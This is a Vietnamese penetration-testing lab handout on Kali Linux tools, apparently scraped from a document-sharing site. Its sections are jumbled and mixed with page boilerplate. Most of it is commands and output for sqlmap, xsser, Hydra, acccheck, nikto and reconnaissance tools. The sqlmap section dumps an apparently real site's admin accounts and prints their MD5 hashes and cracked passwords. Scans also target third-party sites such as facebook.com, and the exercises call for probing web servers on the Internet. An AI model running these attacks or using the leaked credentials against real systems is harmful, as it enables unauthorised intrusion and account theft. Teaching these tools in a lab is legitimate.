thông tin quan trọng nên ta sẽ tập trung khai thác bảng này.
c. Lấy ra các column trong bảng account
http://toto.com.vn/constructionDetail.php?id=334 -D toto -T account --columns
Đây là danh sách các column trong bảng này. Ta thấy có 2 column quan trọng là
username và user_password ở đây nên hãy thử tấn công để tìm ra 2 thông tin này
d. Cho ra danh sách username và password
http://toto.com.vn/constructionDetail.php?id=334 -D toto -T account -C
username,user_password --dump
[17:44:20] [INFO] retrieved: 'b0d38fb7d75823691b324f4df8bbea06','Administrator'
[17:44:20] [INFO] retrieved: '7d27e2e42ebb5a8e51e124cb18c29352','AdminToto'
[17:44:20] [INFO] recognized possible password hashes in column
'user_password'
do you want to store hashes to a temporary file for eventual further processing with other
tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: toto
Table: account
[2 entries]
+---------------+----------------------------------+
| username | user_password |
+---------------+----------------------------------+
| Administrator | b0d38fb7d75823691b324f4df8bbea06 |
| AdminToto | 7d27e2e42ebb5a8e51e124cb18c29352 |
+---------------+----------------------------------+
Kết quả đã có username và password mã hóa MD5. Thử decrypt 2 đoạn mã này sử dụng
các công cụ hiện có trên mạng và kết quả là mật khẩu cho Administrator là webrand và cho
AdminToto là LPadmind.
NSD cũng có thể tấn công các table quan trọng khác trong database này để lấy được
thông tin mình muốn.
2.13.4 Công cụ sqlmap GUI
user01@vmkali:~# python /usr/share/sqlmap/sqlmapapi.py -s
2.14 Công cụ xsser khai thác lỗi XSS
CrossSite Scripter (XSSer) là một công cụ tự động hóa nhằm tìm cách phát hiện và khai
thác lỗ hổng cho các tập lệnh trực tuyến trong các ứng dụng web và trang web. Ngoài ra còn
có một số tùy chọn để tránh phát hiện XSS.
To list all the features XSSer Package “xsser -h”
root@kali:~# xsser -h
To launch a simple Injection attack

root@kali:~# xsser -u “http://192.168.169.130/xss/example1.php?name=hacker”
Injection from Dork, by selecting “google” as search engine:

root@kali:~# xsser –De “google” -d “search.php?q=”
To perform Multiple injections from URL, with Automatic payload, establishing a

reverse connection.
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –auto –reverse-check
-s
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” -g “/path?vuln=” –

Coo –Dom –Fp=”vulnerablescript”
Parameter filtering with heuristics

root@kali:~# xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –
heuristic
To Launch GUI Interface

root@kali:~# xsser –gtk
user01@VMKali:~$
python3 xsser -u 'http://testasp.vulnweb.com' -g 'Search.asp?tfSearch=' -proxy
'http://127.0.0.1:8118? -referer '666.666.666.666? -user-agent 'correct audit' -Fuzz -s
2.15 Công cụ Skipfish – Web Application Security Scanner for XSS, SQL Injection,
Shell injection
Step1: To get all the parameters of type skipfish -h
root@kali:~# skipfish -h
Step2: To scan the target and to write the output in the directory.
root@kali:~# skipfish -d -o 202 http://192.168.169.130/
For scanning Wildcard domains

root@kali:~# skipfish -D .192.168.169.130 -o output-dir1 http://192.168.169.130/
2.16 Công cụ Amap
Amap is a tool that can be used to check the application running on a specific port:
102170044@kali:~$ amap -bq 192.168.1.10 22 80 143
amap v5.4 (www.thc.org/thc-amap) started at 2021-01-25 21:19:20 - APPLICATION MAPPING mode
Protocol on 192.168.1.10:22/tcp matches ssh - banner: SSH-2.0-OpenSSH_7.9p1 Debian-
10\r\nProtocol mismatch.\n
Protocol on 192.168.1.10:22/tcp matches ssh-openssh - banner: SSH-2.0-OpenSSH_7.9p1
Debian-10\r\nProtocol mismatch.\n
Protocol on 192.168.1.10:80/tcp matches http - banner: HTTP/1.1 200 OK\r\nDate Tue, 26 Jan
2021 021920 GMT\r\nServer Apache/2.4.41 (Debian)\r\nLast-Modified Wed, 30 Jan 2019 071229
GMT\r\nETag "29cd-580a7a1fa9140"\r\nAccept-Ranges bytes\r\nContent-Length 10701\r\nVary
Accept-Encoding\r\nConnection close\r\nC
Protocol on 192.168.1.10:80/tcp matches http-apache-2 - banner: HTTP/1.1 200 OK\r\nDate
Tue, 26 Jan 2021 021920 GMT\r\nServer Apache/2.4.41 (Debian)\r\nLast-Modified Wed, 30 Jan
2019 071229 GMT\r\nETag "29cd-580a7a1fa9140"\r\nAccept-Ranges bytes\r\nContent-Length
10701\r\nVary Accept-Encoding\r\nConnection close\r\nC
amap v5.4 finished at 2021-01-25 21:19:27
user01@VMKali:~# amap -bq 192.168.1.115 22 80 143
2.17 Công cụ DNSenum thu thập thông tin DNS
DNSenum cho phép ta lấy được rất nhiều thông tin hữu ích của một domain như:
· Lấy bản ghi địa chỉ IP của domain (bản ghi A).
· Lấy nameservers (bản ghi NS).
· Lấy mailserver (bản ghi MX).
· Thực hiện truy vấn AXFR (all zone transfer) trên các nameservers vừa lấy
được.
· Lấy các subdomain từ google (sử dụng truy vấn “allinurl: -www site:domain”).
· Thực hiện Brute force các subdomain từ file thư viện cho trước. (Ngoài ra, các
bạn cũng có thể brute force subdomains mà không cần file thư viện bằng công cụ
dnsmap mình đã giới thiệu ở bài trước.)
· Tính toán các dải ip lớp C và thực hiện truy vấn whois trên các dải ip đó.
· Ghi lại file domain_ips.txt
Xem những thông tin bản ghi DNS cơ bản và xuất file xml:
user01@kali:~# dnsenum thekalitools.com --noreverse -o thakalitools.xml
2.18 Hash-Identifier
Hash-identifier là một công cụ được tích hợp sẵn trên Kali Linux, giúp ta phân biệt kiểu
thuật toán mã hóa của một chuỗi hash bất kỳ. Chỉ với một tham số đầu vào công cụ này so
với các quy tắt mã hóa của từng thuật toán và xuất ra cho ta biết có thể là được chuỗi hash
này "có thể" được mã hóa bằng thuật toán nào.
2.19 Công cụ Traceroute tool - sử dụng VisualRoute
Visualroute là một tool Tracer rất hiệu quả với giao diện trực quan với nhiều chức năng
như Graphical View, định vị IP, lookup... là công cụ khá mạnh và dễ sử dụng.
Ta nhập thông tin IP hoặc domain muốn test và bấm Trace
Tiến trình hoạt độn của VisualRoute như sau
Trong quá trình Run ta có thể chọn chế độ chạy như Run one, Run every one,Run
Continuously.. sau khi hoàn thành các bản dữ liệu xuất ra thông tin rõ ràng, có thể chọn chế
độ hiển thị để xem.
Analysis : Chức năng này với mục đích phân tích đích đến khu vực nào, thông tin tổng thể
như port, local, loại Fireware, lookup thông tin DNS...
Map : Show vị trí IP từ nguồn đến đích trên bảng đồ, người thực hiện scan có thể biết được
mục tiêu nằm ở vị trí nào trên map, không những năm rõ IP mà vẫn biết được local địa lý.
Router Graph: Liệt kê lên hình các danh sách IP trong quá trình scan từ nguôn đến đích từ
IP local đến IP đích khá chi tiết, nếu hệ thống mạng nào có Fireware hay không, tool cũng
có thể nhận diện được và cũng có thể nhận diện tên của Fireware đó.
Table : Liệt kê danh sách các IP từ nguồn đến đích và hỗ trợ xác định IP thuộc ISP nào cung
cấp, vị trí kiểm tra độ trễ ...
Trace Route ping plot : Giúp giải quyết các vấn đề về mạng. Đó là công cụ chẩn đoán mạng
biểu thị thời gian trễ và mất gói giữa máy tính của bạn và mục tiêu. Hình dung thông tin
tăng tốc quá trình xử lý sự cố của bạn và giúp xây dựng một trường hợp nếu bạn cần thuyết
phục người nào đó có vấn đề tồn tại vào cuối của họ.
History : Cho biết thông tin những đích nào đã scan qua, tổng hợp lịch sử tool đã chạy, chức
năng này hỗ trợ truy vấn tìm kiếm lịch sử theo thời gian thực hiện, khá tiện ích khi tìm lại
nội dung trước đó
Omnipath: Khi quá trình scan ping từ nguồn đến đích, omnipath này có nhiệm vụ kiểm tra
chi tiết từng node, từng để đến và phân tích chi tiết từng node này như avg, min,max...
VisualRoute hỗ trợ nguồn scan, có thể từ máy tính hoặc một số nới, có thể thêm nguồn để
tiến hàng scan. Và trong quá trình scan có thể thể lựa chọn các option phù hợp để quá trình
quét.
2.20 Traceroute tool - Hướng dẫn sử dụng Path Analyzer Pro
Path Analyzer Pro có khả năng kiểm tra theo dõi hiệu suất, DNS, whois, và độ phân giải
mạng để điều tra các vấn đề về mạng. Bằng cách tích hợp tất cả các tính năng mạnh mẽ này
vào một giao diện đồ họa đơn giản, Path Analyzer Pro đã trở thành công cụ cần thiết cho bất
kỳ chuyên gia bảo mật và hỗ trợ trên Microsoft Windows ,MacOS X ,Debian,RedHat ...
Giao diện phần mềm có 3 option nổi bật :
-Standard Options
-Advanced Probe Details
-Advanced Tracing Details.
1) Standard Options :
Phần này tool hỗ trợ cho bạn lựa chọn 3 Protocol : ICMP, TCP, UDP
2) Advanced Probe Details :
§ Length of packet : Độ dài của tập tin, mặc định là 64 bytes
§ Lifetime : Thời gian gói tin khi gởi đi, nếu quá thời gian không nhận được phản
hồi thì xác định nó chết.
§ Type-of-Service
§ Unspecified : Số trường không được điền vào
§ Minimize-Delay : Xác định độ trễ tập tin sẽ hỗ trợ tập tin gởi đi nhanh hơn
§ Maximum TTL : là thời gian mà nameserver khác được cập nhật lại, tính theo
giây
3) Advanced Tracing Details :
§ Work-ahead Limit : giới hạn thời gian nameserver cập nhật lại
§ Minimum Scatter : dùng để đặt thời gian tối thiểu để tạm dừng giữa việc gửi đầu
dò
Phương thức scan :
Target : Mục tiêu cần scan
Port : Port scan có thể chọn mart để chạy tự động.
Thời gian : Có 3 lựa chọn về mặt thời gian (On-time Trace : Scan 1 lầnlần, Timed Trace :
Đặt lích scan vàContinuous Trace : Sẽ chạy mãi mãi đến khi có yêu cầu dừng).
2.21 Automater Kali Linux - Công cụ phân tích website, Md5 Hash OSINT
Automater Kali linux là công cụ phân tích đánh giá website dựa theo IP, URL domain hoặc
kiểm tra chuỗi MD5 hash ... phân tích kiểm tra phát hiện tìm file hoăc đoạn code mã hoá
nguy hiểm chứa mã độc...
Option :
-h, --help : show trợ giúp
-o OUTPUT, --output OUTPUT : ghi file nội dung xử lý xong
-b, --bot : Đưa ra kết qua
-f CEF, --cef CEF : Xuất file định dạng CEF
-w WEB, --web WEB :Xuất file html
-c CSV, --csv CSV : Xuất file csv
-d DELAY, --delay DELAY : Thay đổi Delay
-s SOURCE, --source SOURCE : Xuất ra xml
--proxy PROXY : Thiết lập proxy
user01@bad:~# automater vnexpress.net -o Filelog.txt
Cấu trúc -o output tương ứng với file được lưu (output : tên file), muốn xem file đã lưu
vào đường dẫn của Automater.
user01@bad:/usr/share/automater
2.22 Acccheck Kali linux - Tool kiểm list danh sách password
Acccheck là công cụ được thiết kế như một cuộc tấn công bằng mật khẩu từ danh sách
các từ điển có sẵn nhằm mục đích xác thực cửa sổ thông qua giao thức SMB. Thực hiện
theo một kịch bản có sẵn là bộ từ điển user / password vào 'smbclient' nhị phân và xuất ra
kết quả trong quá trình kiểm tra.
Cách 1: Scan với thư viện có sẵn hoặc tạo thư viên, tạo file ListIP.txt, username.txt,
password.txt
user01@bad:~# touch ListIP.txt
user01@bad:~# nano ListIP.txt nhập vào file IP : 192.168.1.12 , 192.168.1.45...
user01@bad:~# touch username.txt
user01@bad:~# nano username.txt nhập vào file administrator admin phamquang
user01@bad:~# touch password.txt
user01@bad:~# nano password.txt nhập và file 123 abc password ....
Run : acccheck -T(T hoa để hiểu nhập tên file) ListIP.txt -u username.txt -p password.txt
Acccheck sẽ tự động scan danh sách từ các file từ điển tương ứng để xác thực thông tin
đúng hay không.
Cách 2 : Dự đoán thông tin nạn nhân, cách này đoán nạn nhân sẽ sử dụng IP 192.168.1.107
và có user administrator hoặc admin hoặc phamquangloc ... Từ đây sẽ nhập thông tin trực
tiếp.
user01@bad:~# acccheck -t 192.168.1.107 u- administrator -p password.txt
2.23 Brute Forcing Passwords with THC-Hydra

kali@kali:~$ hydra -t 4 -V -f -l admin -P passwordlist.txt rdp://192.168.1.16
...
[3389][rdp] host: 192.168.1.16 login: admin password: 123456
...
kali@kali:~$ cat userlist.txt

user01
nam
xuan
dong
kali@kali:~$ cat passwordlist.txt

123
12345
abcd
qwer
1234qwe
123456
123qwasd
qwas
sdfg
wert
kali@kali:~$
kali@kali:~$ hydra -l user01 -P passwordlist.txt ssh://192.168.1.10 -V
...
[22][ssh] host: 192.168.1.10 login: user01 password: 123456
...
kali@kali:~$ hydra -L userlist.txt -P passwordlist.txt ssh://192.168.1.10 -V
kali@kali:~$ hydra -t 5 -V -f -L userlist.txt -P passwordlist.txt ftp://192.168.1.10
hydra 192.168.1.10 -V -l admin -P passwordlist.txt http-get-form

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Userna
me and/or password incorrect.:H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2;
security=low"
3. BÀI TẬP
1) Khai thác và sử dụng các công cụ của Kali để quét thông tin một WebServer trên
Internet.
2) Khai thác và sử dụng các công cụ của Kali để quét các lỗ hổng của một
WebServer trên Internet.
3) Khai thác các công cụ khác của Kali Linux.

Lab 6

Uploaded by

Copyright:

Available Formats

You might also like

Lab 6

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Lab 6

Uploaded by

Copyright:

Available Formats

THỰC HÀNH CÁC CÔNG CỤ

KIỂM THỬ XÂM NHẬP MẠNG TRÊN KALI LINUX

user01@VMKali:~$ theharvester -d dut.udn.vn -l 500 -b google

user01@VMKali:~$ theharvester -d google.com.vn -l 500 -b google

user01@VMKali:~$ theharvester -d microsoft.com -l 500 -b google -f myresults.html

user01@VMKali:~$ theharvester -d microsoft.com -b pgp, virustotal

user01@VMKali:~$ theharvester -d microsoft -l 200 -b linkedin

user01@VMKali:~$ theharvester -d microsoft.com -l 200 -g -b google

user01@VMKali:~$ theharvester -d apple.com -b googleCSE -l 500 -s 300

user01@VMKali:~$ theharvester -d cornell.edu -l 100 -b bing -h

2.2 Công cụ Dmitry lấy thông tin Website

• Thực hiên quét cổng TCP trên một host.

• Thu thập các subdomain trên một host.

• Thu thập Whois trên một host.

• Lấy các thông tin của một host từ Netcraft.

1) Dò tìm thông tin (Whois) một Website:

user01@VMKali:~$ dmitry -w www.facebook.com

user01@VMKali:~$ dmitry -w www.google.com

user01@VMKali:~$ dmitry -winsepo toto.com.vn toto.com.vn.txt

3) Thu thập các subdomain:

4) Để thu thập email của một website

5) Quét các cổng TCP của máy chủ Web

user01@VMKali:~$ dmitry -p 192.168.1.115

//192.168.1.115 là địa chỉ của máy VMMetasploitableLinux2

2.3 Công cụ whois thu thập thông tin máy chủ

user01@VMKali:~$ whois -h whois.crsnic.net "domain google.com"

=> Tool online:

2.4 Công cụ Uniscan quét lỗi bảo mật Website

2) Để quét nhiều website cùng một lúc:

wesites.txt là một danh sách website đã được chuẩn bị sẵn.

2) Kiểm tra nhanh lỗi web server

user01@VMKali:~# nikto -host http://192.168.1.115

user01@VMKali:~# nikto -host http://192.168.1.115 -p 80 -T 3478b -t 3 -D \ V -o

user01@VMKali:~# nikto -h webscantest.com

user01@VMKali:~# nikto -h webscantest.com -p 80 -T 3478b -t 3 -D \ V -o webtest -F

user01@VMKali:~# nikto -h wonderhowto.com

user01@VMKali:~# nikto -h facebook.com

user01@VMKali:~# nikto -host https://www.toto.com.vn:8080

4) Dò tìm lỗi chạy thông qua Proxy

5) Cập nhật cơ sở dữ liệu cho nikto

• Hỗ trợ proxy khi quét.

• Quét cổng trên máy chủ.

tar xzvf darkjumper.v5.7.tar.gz

1) Để reverse ip của một trang:

user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.10 -m full

user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.115 -m full

user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.115 -m reverseonly

user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t webscantest.com -m full

user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t toto.com.vn -m reverseonly

2) Lấy các thông tin header của một Website

• Bruteforce các mật khẩu trên WordPress.

• Kiểm tra phiên bản của WordPress.

• Kiểm tra plugin của WordPress.

2) Quét các giao diện trên WordPress (--enumerate -t)

7) Dò tìm mật khẩu

Evaluates the security of a target SSL/TLS (HTTPS) server

user01@VMKali:~$ tlssled 192.168.1.115 80

user01@VMKali:~$ tlssled www.facebook.com.vn 80